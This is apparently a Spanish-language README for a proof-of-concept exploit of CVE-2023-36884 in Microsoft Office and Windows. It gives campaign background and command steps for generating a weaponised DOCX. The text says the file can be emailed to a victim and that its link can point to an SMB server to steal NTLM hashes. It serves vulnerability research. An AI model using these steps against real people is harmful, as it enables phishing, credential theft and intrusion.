
MS Office y Windows HTML RCE (CVE-2023-36884) - PoC y exploit
El 11 de julio de 2023, Microsoft publicó un parche destinado a abordar múltiples vulnerabilidades de ejecución remota de código (RCE) explotadas activamente. Esta acción también sacó a la luz una campaña de phishing orquestada por un actor de amenazas conocido como Storm-0978, dirigida específicamente a organizaciones en Europa y América del Norte. En el centro de esta campaña se encontraba una vulnerabilidad de día cero, designada como CVE-2023-36884, que permitía al atacante explotar archivos de búsqueda de Windows mediante documentos Office Open eXtensible Markup Language (OOXML) meticulosamente elaborados con señuelos geopolíticos relacionados con el Congreso Mundial de Ucrania (UWC). Aunque inicialmente se propuso una solución alternativa para mitigar esta vulnerabilidad, Microsoft publicó una actualización de Office Defense in Depth el 8 de agosto de 2023, que rompió efectivamente la cadena de explotación que había conducido a la RCE a través de archivos de búsqueda de Windows (*.search-ms).
Este script de explotación está escrito para un análisis de CVE en vsociety.
Instale los paquetes PIP:
pip install python-docx pywin32
Cree un archivo example.html e inicie un servidor web HTTP de Python:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
Luego, ejecute el script:
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html
Ahora el archivo generado puede compartirse con la víctima por correo electrónico o por otro medio. El enlace puede apuntar a su servidor SMB para robar el hash NTLM de la víctima o a un archivo HTML que contenga un iframe con una referencia a un archivo de Búsqueda de Windows, tal como en el malware original. Debido a la falta de información adicional, la explotación exacta no puede mostrarse.
Este script de explotación ha sido creado únicamente con fines de investigación y para el desarrollo de técnicas defensivas efectivas. No está destinado a ser utilizado para actividades maliciosas o no autorizadas. El autor y el propietario del script rechazan cualquier responsabilidad por el mal uso o los daños causados por este software. Se insta a los usuarios a utilizar este software de manera responsable y solo de acuerdo con las leyes y regulaciones aplicables. Úselo de manera responsable.